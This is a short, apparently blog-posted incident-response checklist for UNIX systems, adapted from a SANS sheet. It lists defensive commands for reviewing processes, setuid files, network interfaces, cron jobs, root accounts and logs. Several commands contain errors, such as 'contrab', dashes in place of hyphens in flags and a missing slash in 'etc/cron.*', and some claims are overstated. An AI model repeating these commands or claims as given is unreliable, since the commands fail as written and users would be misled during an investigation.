UNIX Incident Response

This template is based off of a similar cheat sheet from the SANS Institute as the one for Windows; however, it is for UNIX based systems. Please be aware that the power behind UNIX systems is in the command line interface (or shell) and therefore it is necessary to be proficient in being able to use it for not only troubleshooting, but also determining whether a system was compromised. Please note that some of these commands may require root (or equivalent) privileges in order to use them (I would personally recommend using the sudo command, if available to perform root required tasks).

a.     To look for unusual processes and services use the following commands:

a.     ps -aux – displays running processes along with their process-id (PID), associated user-ids (UID #), name, and other pertinent information. Pay particular attention to any process that is using the UID 0 user-id, because those processes are running with root permissions.

b.     ps –ef – displays the full listing of all processes and can be useful for finding undesirable processes that are running.

c.     lsof –p (PID) – displays a specific process in more detail, by displaying the files and ports associated with that process. This is appropriate for examining any Trojan, worms, and other network based malware on a UNIX system.

d.     lsof +L1 – displays processes running from or accessing files that have been unlinked; basically it will show one to figure out if the attacker is hiding data or running a backdoor.

b.     To look for unusual files the “find” command along with its various flags allows one to search a UNIX system for malware. A few examples are listed below:

a.     find / -uid 0 -perm -4000 –print – searches for files that have root permissions.

b.     find / -size +50000k –print – searches for files of a specified or greater size.

c.     This is particularly useful for searching for files that may not belong on the system, like movies, games, etc.

c.     To look for unusual network usage coming from a system’s network interface type in the following command

a.     ip link | grep PROMISC – this command will display any network interfaces that are running in promiscuous mode, which can be a clear indication of an attacker running a packet sniffer.

b.     Other useful commands to observe unusual network behavior are:

c.     netstat -nap – this displays listening ports and in turn can be useful for finding backdoors.

d.     arp -a – displays all MAC to IP address mappings of the system and can be useful for finding addresses of systems that are not part of the network (e.g. a rouge wireless access point that allows one to gain access into the internal network from the outside).

d.     To look for scheduled jobs (i.e. tasks) by root or any other user, type in the following command:

a.     contrab –u root –l – this is useful for detecting logic bombs, scheduled connections to unknown hosts, and other potentially nefarious issues.

b.     Two additional commands to display system-wide cron jobs are:

c.     cat /etc/crontab – displays all jobs scheduled within the cron table.

d.     ls etc/cron.* - lists files within the cron subdirectories.

e.     To look for unusual accounts use the following commands to check the following files:

a.     sort –nk3 –t: /etc/passwd | less – displays all accounts sorted by UID (e.g.UID0, etc), this is useful for finding accounts with root permissions or accounts that do not belong on the system.

b.     egrep ‘:0:’ /etc/passwd – displays only accounts with root permissions.

c.     getent passwd | grep ‘:0:’ – same as above, except for systems with multiple authentication mechanisms.

d.     find / -nouser –print – searches the entire system for orphaned files that may have been deleted by an attacker’s temporary account.

f.      The best place to check for unusual system activity is the log files, especially in UNIX. Most log files are in /var/log (or var/logs), or var/messages. A good command to use for viewing log files is:

a.     more –f /var/log/messages – this allows a page by page review of all logged events. Pay attention to user authentication logins and any unusual patterns such as missing entries and times that may indicate an intruder is trying to hide his/her tracks.

g.     Other commands to check for possible clues are:

a.     uptime – displays how long a system has been up and running. If the system’s uptime is shorter or longer than it should be, then it could be a clear indication that something has changed and therefore may need further review.

b.     free – is useful for checking how much ram is used. This is useful for detecting processes that are using a lot of memory (e.g. an attacker searching or modifying a database, etc).

c.     df – is useful for checking available disk space. This can provide a reliable indication as to whether an attacker is installing malware or removing files from a system.

http://www.sans.org/score/checklists/ID_Linux.pdf

 

Posted on